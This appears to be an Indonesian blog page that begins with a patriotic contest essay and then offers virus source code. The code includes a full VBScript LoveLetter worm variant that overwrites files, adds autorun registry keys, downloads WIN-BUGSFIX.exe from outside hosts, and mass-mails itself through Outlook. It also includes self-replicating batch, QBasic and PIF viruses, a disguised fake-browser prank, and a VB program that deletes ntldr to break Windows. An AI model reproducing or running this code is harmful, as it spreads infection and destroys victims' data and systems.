Web Hosting


Indosat Blog Contest (SinyalKuat.co.cc)

Indonesia Tempatku Berteduh

Indonesia…sebuah negeri yang hanya dipandang orang sebelah mata. Saya sendiri sebagai orang Indonesia merasa sangat terhina atas pandangan orang-orang tersebut terhadap negeri kelahiran saya dan sangat saya cintai.
Saya tidak berharap Indonesia maju ataupun modern seperti negara-negara Eropa pada umumnya, saya hanya menginginkan Indonesia dapat menjadi negara yang makmur, semua masyarakat yang tinggal di Indonesia dapat hidup secara layak, tidak ada lagi yang mati karena kelaparan dan banyak hal lainnya yang hanya disebabkan oleh ketidakmampuannya. Saya berharap seluruh penjuru Indonesia dapat hidup saling membantu, saling menolong satu sama lain, tak ada lagi yang hidup terlalu miskin, saya berharap kepada orang-orang yang mampu menyumbangkan sebagian hartanya kepada orang-orang yang tidak mampu, agar kita semua di Indonesia dapat hidup dalam kemakmuran.

Indonesia saat ini tidak perlu membangun bangunan tinggi-tinggi, menghancurkan lahan-lahan pertanian dan banyak lainnya yang dapat merugikan Indonesia sendiri. Indonesia hanya perlu memakmurkan bangsanya dan itulah yang harus kita lakukan sebagai masyarakat yang mampu dipandangan orang-orang.
Untuk dapat memakmurkan Indonesia maka diperlukanlah ahli-ahli yang dapat mengubah bangsa ini, untuk itu saya berharap kepada siswa/siswi dan juga kepada mahasiswa, kita tidak hanya berniat sekolah dan kuliah hanya untuk mencari uang dan pangkat, disamping berniat karena Allah SWT, kita hendaklah berniat untuk dapat memakmurkan bangsa Indonesia ini, berniat agar Indonesia tidak lagi dipandang sebelah mata oleh orang lain.
Mungkin hanya itu yang dapat saya paparkan, mungkin setelah Indonesia makmur banyak lagi yang dapat dilakukan generasi penerus untuk Indonesia ini, saya juga tidak lupa berdo’a kepada Allah SWT agar Indonesia menjadi negara yang makmur tidak ada lagi perselisihan, tak ada lagi yang mati kelaparan, dan banyak hal lainnya yang buruk yang dapat terjadi pada Indonesia.
Ya Allah jadikan Indonesia sebagai negara yang tidak hanya dipandang sebelah mata, jadikanlah rakyat-rakyatnya dapat saling membantu untuk kemakmuran dan untuk hal lainnya yang dapat membuat semuanya jadi indah, Ya Allah sadarkanlah para generasi penerus yang masih sibuk bermain dan merusak negeri ini, buatlah mereka belajar lebih rajin lagi dan pada akhirnya mereka dapat membuat “Indonesia” adalah sebuah nama yang membuat orang rindu akannya.


Readmore...

Posted in Label: | 6 komentar

Source kode virus...

ny source virus VBS yang lumayan stresss virus I LOVE U !

cuma sekedar mau ngeshare buat penelitian !

gak ada maksud lain !,demi kemajuan bangsa indonesia jga ! Rolling Eyes Rolling Eyes Rolling Eyes Rolling Eyes


Quote:
rem barok -loveletter(vbe) <i hate go to school>


rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /


Manila,Philippines


On Error Resume Next


dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow


eq=""



ctr=0


Set fso = CreateObject("Scripting.FileSystemObject")


set file = fso.OpenTextFile(WScript.ScriptFullname,1)


vbscopy=file.ReadAll


main()


sub main()


On Error Resume Next


dim wscr,rr



set wscr=CreateObject("WScript.Shell")


rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting


Host\Settings\Timeout")


if (rr>=1) then


wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting


Host\Settings\Timeout",0,"REG_DWORD"


end if


Set dirwin = fso.GetSpecialFolder(0)



Set dirsystem = fso.GetSpecialFolder(1)


Set dirtemp = fso.GetSpecialFolder(2)


Set c = fso.GetFile(WScript.ScriptFullName)


c.Copy(dirsystem&"\MSKernel32.vbs")


c.Copy(dirwin&"\Win32DLL.vbs")


c.Copy(dirsystem&"\RYAN_HIJACKERS.txt.vbs")


regruns()



html()


spreadtoemail()


listadriv()


end sub


sub regruns()


On Error Resume Next


Dim num,downread


regcreate


"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32



",dirsystem&"\MSKernel32.vbs"


regcreate


"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi


n32DLL",dirwin&"\Win32DLL.vbs"


downread=""


downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet


Explorer\Download Directory")



if (downread="") then


downread="c:\"


end if


if (fileexist(dirsystem&"\WinFAT32.exe")=1) then


Randomize


num = Int((4 * Rnd) + 1)


if num = 1 then


regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start



Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj


w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"


elseif num = 2 then


regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start


Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe


546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"


elseif num = 3 then


regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start


Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm



POhfgER67b3Vbvg/WIN-BUGSFIX.exe"


elseif num = 4 then


regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start


Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh


YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX


.exe"


end if


end if



if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then


regcreate


"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI


X",downread&"\WIN-BUGSFIX.exe"


regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start


Page","about:blank"


end if


end sub



sub listadriv


On Error Resume Next


Dim d,dc,s


Set dc = fso.Drives


For Each d in dc


If d.DriveType = 2 or d.DriveType=3 Then


folderlist(d.path&"\")


end if



Next


listadriv = s


end sub


sub infectfiles(folderspec)


On Error Resume Next


dim f,f1,fc,ext,ap,mircfname,s,bname,mp3


set f = fso.GetFolder(folderspec)


set fc = f.Files



for each f1 in fc


ext=fso.GetExtensionName(f1.path)


ext=lcase(ext)


s=lcase(f1.name)


if (ext="vbs") or (ext="vbe") then


set ap=fso.OpenTextFile(f1.path,2,true)


ap.write vbscopy


ap.close


elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")



or (ext="hta") then


set ap=fso.OpenTextFile(f1.path,2,true)


ap.write vbscopy


ap.close


bname=fso.GetBaseName(f1.path)


set cop=fso.GetFile(f1.path)


cop.copy(folderspec&"\"&bname&".vbs")



fso.DeleteFile(f1.path)


elseif(ext="jpg") or (ext="jpeg") then


set ap=fso.OpenTextFile(f1.path,2,true)


ap.write vbscopy


ap.close


set cop=fso.GetFile(f1.path)


cop.copy(f1.path&".vbs")


fso.DeleteFile(f1.path)



elseif(ext="mp3") or (ext="mp2") then


set mp3=fso.CreateTextFile(f1.path&".vbs")


mp3.write vbscopy


mp3.close


set att=fso.GetFile(f1.path)


att.attributes=att.attributes+2


end if


if (eq<>folderspec) then



if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or


(s="script.ini") or (s="mirc.hlp") then


set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")


scriptini.WriteLine "[script]"


scriptini.WriteLine ";mIRC Script"


scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,


if mIRC will"


scriptini.WriteLine " corrupt... WINDOWS will affect and will not run



correctly. thanks"


scriptini.WriteLine ";"


scriptini.WriteLine ";Khaled Mardam-Bey"


scriptini.WriteLine ";http://www.mirc.com"


scriptini.WriteLine ";"


scriptini.WriteLine "n0=on 1:JOIN:#:{"


scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"


scriptini.WriteLine "n2= /.dcc send $nick



"&dirsystem&"\Ryan_hijackers.HTM"


scriptini.WriteLine "n3=}"


scriptini.close


eq=folderspec


end if


end if


next


end sub



sub folderlist(folderspec)


On Error Resume Next


dim f,f1,sf


set f = fso.GetFolder(folderspec)


set sf = f.SubFolders


for each f1 in sf


infectfiles(f1.path)


folderlist(f1.path)



next


end sub


sub regcreate(regkey,regvalue)


Set regedit = CreateObject("WScript.Shell")


regedit.RegWrite regkey,regvalue


end sub


function regget(value)


Set regedit = CreateObject("WScript.Shell")


regget=regedit.RegRead(value)



end function


function fileexist(filespec)


On Error Resume Next


dim msg


if (fso.FileExists(filespec)) Then


msg = 0


else


msg = 1



end if


fileexist = msg


end function


function folderexist(folderspec)


On Error Resume Next


dim msg


if (fso.GetFolderExists(folderspec)) then


msg = 0


else



msg = 1


end if


fileexist = msg


end function


sub spreadtoemail()


On Error Resume Next


dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d


set regedit=CreateObject("WScript.Shell")



set out=WScript.CreateObject("Outlook.Application")


set mapi=out.GetNameSpace("MAPI")


for ctrlists=1 to mapi.AddressLists.Count


set a=mapi.AddressLists(ctrlists)


x=1


regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)


if (regv="") then


regv=1



end if


if (int(a.AddressEntries.Count)>int(regv)) then


for ctrentries=1 to a.AddressEntries.Count


malead=a.AddressEntries(x)


regad=""


regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)


if (regad="") then


set male=out.CreateItem(0)



male.Recipients.Add(malead)


male.Subject = "attacked"


male.Body = vbcrlf&"mampus PC lw kena virus gw !"


male.Attachments.Add(dirsystem&"\RYAN_HIJACKERS.TXT.vbs")


male.Send


regedit.RegWrite


"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"



end if


x=x+1


next


regedit.RegWrite


"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count


else


regedit.RegWrite


"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count



end if


next


Set out=Nothing


Set mapi=Nothing


end sub


sub html


On Error Resume Next


dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6



dta1="<HTML><HEAD><TITLE>Ryan_hijackers - HTML<?-?TITLE><META


NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _


"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?



@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _


"<META NAME=@-@Description@-@ CONTENT=@-@ryan_hijackers the cyber devil !@-@>"&vbcrlf& _


"<?-?HEAD><BODY



ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#Ryan_hijackers.HTM#


-#,#-#main#-#)@-@ "&vbcrlf& _


"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#Ryan_hijackers.HTM#


-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _


"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read



this HTML file<BR>- Please press #-#YES#-# button to Enable


ActiveX<?-?p>"&vbcrlf& _


"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@


BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>



"&vbcrlf& _


"<?-?BODY><?-?HTML>"&vbcrlf& _


"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _



"<!--?-??-?"&vbcrlf& _


"if (window.screen){var wi=screen.availWidth;var


hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _


"?-??-?-->"&vbcrlf& _



"<?-?SCRIPT>"&vbcrlf& _


"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _


"<!--"&vbcrlf& _



"on error resume next"&vbcrlf& _


"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _


"aw=1"&vbcrlf& _


"code="



dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _


"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _


"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf& _



"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf& _


"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf& _


"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _



"wri.write code4"&vbcrlf& _


"wri.close"&vbcrlf& _


"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _



"if (err.number=424) then"&vbcrlf& _


"aw=0"&vbcrlf& _


"end if"&vbcrlf& _


"if (aw=1) then"&vbcrlf& _



"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _


"window.close"&vbcrlf& _


"end if"&vbcrlf& _


"end if"&vbcrlf& _



"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _


"regedit.RegWrite


@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru


n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _


"?-??-?-->"&vbcrlf& _



"<?-?SCRIPT>"


dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")


dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")


dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")



dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")


dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")


dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")


dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")


dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")



set fso=CreateObject("Scripting.FileSystemObject")


set c=fso.OpenTextFile(WScript.ScriptFullName,1)


lines=Split(c.ReadAll,vbcrlf)


l1=ubound(lines)


for n=0 to ubound(lines)


lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91))


lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93))


lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37))



if (l1=n) then


lines(n)=chr(34)+lines(n)+chr(34)


else


lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"


end if


next


set b=fso.CreateTextFile(dirsystem+"\Ryan_hijackers.HTM")



b.close


set d=fso.OpenTextFile(dirsystem+"\Ryan_hijackers.HTM",2)


d.write dt5


d.write join(lines,vbcrlf)


d.write vbcrlf


d.write dt6


d.close


end sub


Readmore...

Posted in Label: | 2 komentar

Batch Virus Code

Lansung aja ya,,,
semua code dibawah ini copy ke notepad trus save dalam format ".bat"

The Wagner Virus





--------------------------------Code-------------------------------


@echo off


ctty nul


rem ______________________________________________________________


rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf


rem :This virus can be cured simply by typing "attrib -h -r *.*" in



rem :infected directories and deleting BAT files that are identical


rem :to this code, then rename the files having a "V" at the start


rem :to their original names. NOTE: Does not infect COMMAND.COM.


rem :______________________________________________________________


for %%f in (*.exe *.com) do set A=%%f


if %A%==COMMAND.COM set A=


rename %A% V%A%


if not exist V%A% goto end



attrib +h V%A%


copy %0.bat %A%


attrib +r %A%


ren %A% *.bat


set A=


:end


ctty con


@if exist V%0.com V%0.com %1 %2 %3


@if exist V%0.exe V%0.exe %1 %2 %3



----------------------------End of Code----------------------------





2-


Batch virus "_!"


----------------





Infects parent and current directories


Virus code is appended to the host batch



Only works if host is in current directory


Infects just one batch unless new clean batches are added





This is a very simple batch virus. When it runs it appends its code


to another batch file in the parent or current directory. It is not


very effective but illustrates the basics.





----------------------------(cut here)------------------------------------


@ctty nul._!



for %%a in (*.bat ..\*.bat) do set _!=%%a


find "_!"<%_!%


if errorlevel 1 find "_!"<0>>%_!%


ctty con._!


----------------------------(cut here)-----------------------------------





3-



Batch virus "BfV"


-----------------





Creates the hidden file "_BFV" in the root directory of drive C


Infects one batch per run in current and parent directories


Gives up after encountering seven infected batches


Virus code is appended to the host batch






This is an improved appender. It only has to be run from its own directory


once to enable it to reproduce even when the host is in a path directory.


To avoid slowing batch files down too much it exits if it can't infect


after checking seven batch files. If the host batch ends with nul characters


it removes them so the virus code will run.





----------------------------(cut here)------------------------------------


@echo off%[BfV_B]%


if '%1=='## goto BfV_%2



if exist C:\_BfV.bat goto BfV_


if not exist %0.bat goto BfV_end


find "BfV"<0>C:\_BfV.bat


attrib C:\_BfV.bat +h


:BfV_


command /e:5000 /c C:\_BfV ## run


goto BfV_end



:BfV_run


for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i


exit BfV


:BfV_inf


if '%BfV%=='1111111 exit


set BfV=%BfV%1


find "BfV"<3>nul


if not errorlevel 1 goto BfV_end



type %3>BfV


type C:\_BfV.bat>>BfV


move BfV %3>nul


exit BfV


:BfV_end


----------------------------(cut here)------------------------------------


4-



Batch virus "MeLT"


------------------





Creates the hidden file "MELT_2A" in the temp directory


Infects files in the current, parent and all path directories


Infects one batch per run if less than ten infected files encountered


After detecting ten infected files it displays a graphics screen effect


Adds one line before the host batch and appends the rest



Will not run if attached to AUTOEXEC.BAT (but infects it)





This batch virus is much more advanced. It takes control from the host


immediately, runs the virus then runs the host batch. The host is run in


such a way as to disable the virus until the host is completely finished


to avoid slowing down batch files that call themselves in a loop. Simple


appenders are very obvious when on such files, but this one causes no


significant speed loss except at startup. This virus carries a harmless


payload which is assembled with the debug command - it 'melts' the screen



in a flash of color then returns it to normal before running the host.





----------------------------(cut here)------------------------------------


@if not '%0==' if '%_melt%==' goto meltbeg


::---- dummy host --------


@echo off


echo Hello World!


::---- end dummy host ----





@goto MeLTend [MeLT_2a]


:MeLTbeg


@echo off%_MeLT%


if '%1=='MeLT goto MeLT%2


if not exist %comspec% set comspec=%_MeLT%command


%comspec% /e:5000 /c %0 MeLT vir


set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9


call %0 MeLT rh



set _MeLT=


set MeLTcl=


goto MeLTend


:MeLTrh


set _MeLT=x


%0 %MeLTcl%


:MeLTvir


set MeLTH=%0



if not exist %_MeLT%%temp%\nul set temp=%tmp%


if exist %temp%\MeLT_2a goto MeLTrun


%0 MeLT fnd . %path%


:MeLTfnd


shift%_MeLT%


if '%2==' exit MeLT


set MeLT=%2\%MeLTH%.bat


if not exist %MeLT% set MeLT=%2\%MeLTH%


if not exist %MeLT% set MeLT=%2%MeLTH%.bat



if not exist %MeLT% set MeLT=%2%MeLTH%


if not exist %MeLT% goto MeLTfnd


find "MeLT"<MeLT>%temp%\MeLT_2a


attrib %temp%\MeLT_2a +h


:MeLTrun


%MeLTH% MeLT s . .. %path%


:MeLTs



shift%_MeLT%


if '%2==' exit MeLT


for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a


goto MeLTs


:MeLTinf


find /i "MeLT"<3>nul


if not errorlevel 1 goto MeLTno


echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t



type %3>>MeLT.t


echo.>>MeLT.t


type %temp%\MeLT_2a>>MeLT.t


move MeLT.t %3>nul


exit MeLT


:MeLTact - flash-melt screen text then put back to normal



echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t


echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t


echo e 120 B4 4C CD 21 00>>MeLT.t


echo g>>MeLT.t


debug<MeLT>nul


del MeLT.t



exit MeLT


:MeLTno


set MeLTC=%MeLTC%1


if %MeLTC%==1111111111 goto MeLTact


:MeLTend


----------------------------(cut here)------------------------------------









5-


QBasic virus "BasVir"


---------------------





Infects one BAS file in the current directory per run


Inserts its code in front of the host so it will run first


Does not infect QBasic programs that contain "DECLARE"


Really a batch virus that hides in BASIC code


If the host is renamed the virus won't work






I wrote this in response to someone's request on the net for a virus


written in BASIC. I hope they don't mind if the BASIC program makes


a batch and runs it. It stays out of programs that use procedures to


avoid causing errors, such programs cannot tolerate prepended code.


This is really a joke, but it's a QBasic virus (no? you write one.)





The following must be named BASVIR.BAS to function.





----------------------------(cut here)------------------------------------


basvirH$ = "BASVIR.BAS"


OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir


PRINT #2, "@echo off %BasVir1%"


PRINT #2, "if '%1=='BasVir goto BasVir%2"


PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a"


PRINT #2, "exit": REM BasVir


PRINT #2, ":BasVir2"



PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<3>nul": REM BasVir


PRINT #2, "if not errorlevel 1 goto BasVirE"


PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir


PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<basvirH>nul


if exist PiFV! del PiFV!


:: run the host



set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9


call %0 PiFV hst


set PiFVo=


set PiFVcl=


:: check for activation...


echo.|date|find /i "sat">nul.PiFV


if errorlevel 1 goto PiFV_end


echo.|time|find "7">nul.PiFV



if errorlevel 1 goto PiFV_msg


set PiFV=echo


cls%_PiFV%


%PiFV%.


%PiFV% There once was an Otter named Oscer


%PiFV% Who claimed to know how to make water.


%PiFV% "No more dams," he said, "use my water instead!"


%PiFV% But the Elder Otter was not impressed.



pause>nul.PiFV


set PiFV=


goto PiFV_end


:PiFV_msg


echo [PiFV] by WaveFunc


goto PiFV_end


:PiFV_hst


%PiFVo% %PiFVcl%



goto PiFV_end


:PiFV_go


set PiFVh=%0


if not exist %PiFVh% set PiFVh=%0.bat


if not exist %PiFVh% exit


for %%a in (*.pif) do call %0 PiFV inf %%a


exit PiFV


:PiFV_inf


set PiFVp=%3



:: get victim filename and infection marker


:: from PIF file using debug...


if exist PiFV! goto PiFV_1


echo m 124,162 524>PiFV!


echo e 100 '@set fn='>>PiFV!


echo m 524,562 108>>PiFV!


echo n pifv$.bat>>PiFV!



echo rcx>>PiFV!


echo 47>>PiFV!


echo w>>PiFV!


echo m 55E,561 108>>PiFV!


echo e 10C 0>>PiFV!


echo n pifv$$.bat>>PiFV!



echo rcx>>PiFV!


echo 10>>PiFV!


echo w>>PiFV!


echo q>>PiFV!


:PiFV_1


debug %PiFVp%<PiFV>nul



call PiFV$


set PiFVn=%fn%


call PiFV$$


set PiFVi=%fn%


del PiFV$?.bat


:: pifvn=orig filename


:: pifvi=infection marker


:: pifvp=pif filename



:: pifvh=companion bat file


:: skip infected or 'empty' pifs...


if '%PiFVi%=='PiFV goto PiFV_end


if '%PiFVn%==' goto PiFV_end


:: don't shadow command.com (be nice)


echo %PiFVn%|find /i "command">nul


if not errorlevel 1 goto PiFV_end


:: infectable - create a companion batch...



:: (the following code strips off the extension)


echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$


echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$


echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$


echo n pifv$.com>>PiFV$$


echo rcx>>PiFV$$



echo 2a>>PiFV$$


echo w>>PiFV$$


echo q>>PiFV$$


debug<PiFV>nul


echo %PiFVn%|PiFV$>PiFV$$.bat


call PiFV$$



set PiFVb=%fn%.bat


del PiFV$?.*


:: pifvb=new batch name


:: do not shadow if comp has same name as host


if %PiFVo%==%PiFVb% goto PiFV_end


if exist %PiFVb% goto PiFV_end


echo @echo off>%PiFVb%


echo set pifvo=%pifvn%>>%PiFVb%



find "PiFV"<PiFVh>>%PiFVb%


attrib %PiFVb% +h


:: ...and point the PIF at the companion


echo e 15E 'PiFV',0>PiFV$$


echo e 124 '%PiFVb%',0>>PiFV$$


echo w>>PiFV$$



echo q>>PiFV$$


debug %PiFVp%<PiFV>nul


del PiFV$$


:: I think we're done!


exit PiFV


:PiFV_end


:: wonder how many bugs all this has in it? Only one



:: way to find out...


Readmore...

Posted in Label: | 0 komentar

Membuat virus palsu...

Waoi....
Nhe g ada cara cepet buat ngerjain orang tanpa tool apapun...
Kecuali notepad.....
Caranya gene....
1. Matiin DF kalo disitu ada Df...Trus restart....
2. Masuk ke notepad....


3. Ketikkan source code ini...
Source nya sengaja ga g masukin ke kategori code...
Cos ntar g susah nandainnya....


<html>
<head>
</head>
<title>
Virus Algojo
</title>
<body background="http://tbn0.google.com/images?q=tbn:UhZDDeUoABr1KM:http://orangemood.files.wordpress.com/2007/04/love.jpg">
<font face="Comic Sans MS" color="white" size="5">
<marquee behavior="Alternate" scrolldelay="90">
Saya adalah virus yang dibuat untuk memperlambat proses kerja internet....
<br>
</marquee>
<br><br><br><br><br><br><br><br><br>
<center>
Salam Kenal...
</center>
</font>
<center>
<font face="Comic Sans MS" color="white" size="50">
Virus by : Cyberlogica
</center>
</font>
</body>
</html>

Liat...

Source code yg g merahin itu adalah code yg bisa kalian ubah2 terserah maw kyk gmana.....

Sbenernya smwa terserah jg c...

Cm ini g ngasi yg instan aja....

virus palsu ini bisa jalan kalo web browsernya " FF n IE"....Opera g ga tau coz lom pnah coba.....



Laughing



Nah kalo uda...
Di copy n diganti2 skg usave di desktop dengan nama dengan browser tersebut....

Mis :
Internet Explorer.....

Nanti u save pake nama internet Explorer juga....Tapi berformat HTML bukan TXT
Cuma nanti Internet Explorer >> browsernya u apus dari desktop juga dari Recycle....
Trus Internet Explorer >> Buatan u....

Usahain jgn ampe kliatan formatnya....Yaitu HTML tadi...
Kalo browsernya ada 2 FF n IE u bwt dg cara yg sama.....
Caranya...

Masuk ke file apapun....

Masuk ke tools >> Folder Option >> View >> yang hide extension type itu u kasi tanda centAng....

Nah proses pembuatan virus dah selesai........ Wink



Readmore...

Posted in Label: | 0 komentar

Buat virus pake VB

Gene2.....
1...
Buat form...
2
visible mode = false >> ada di plihan propertiesnya..
3.
Dah jadi kn..Klik 2x pada formnya...


Muncul

Code:
Private Sub Form_Load()
End Sub


4.
Di vb...Kn ada yang namanya perintah / code KILL...
kill ini berfungsi utk menghapuz file dengan ext nya...
cth : aku.txt....
Laughing Laughing Laughing
Dah ngerti kn mpe sini???
Ga bngung???
Razz Ga.... Pa guru...... Razz
Ok kalo gt lanjut....
5.
kembali ke urutan 3.
Setelah tampilan
Code:
Private Sub Form_Load()
End Sub


muncul...
Maka yang harus dilakukan adalah....
membuat perintah di dalam source itu...
Perintah yang akan kita buat adalah Kill.....
Kalian tahu tidak bentuk code Kill bagiamana???

Razz Tidak Pa guru... Razz
Ok...
Kalo gitu bbiar saya jelaskan...
Pattern kill itu seperti ini...
Kill "alamat file"
Cthnya...
Kill "C:\Windows\explorer.exe"

Nah itu merupakan btk dari code KILL..

Sekarang mari kita terpakan code KILL ke dalam aplikasi VB
Code:
Private Sub Form_Load()
'Masukkan code kill disini
Kill "C:\ntldr"
End Sub


Seperti yg sudah sya informasikan bahwa ntldr adalah salah satu file ptg pada windows...
Jadi kalo kita delete alhasil windows bisa crash....

Nah...
Abis itu...
Klik Menu File >> Make Form1.exe
Setelah itu save..
Maka code yg tlah anda ciptakan tadi berubah mjd btk exe....
Wink Wink Wink Wink


Readmore...

Posted in Label: | 0 komentar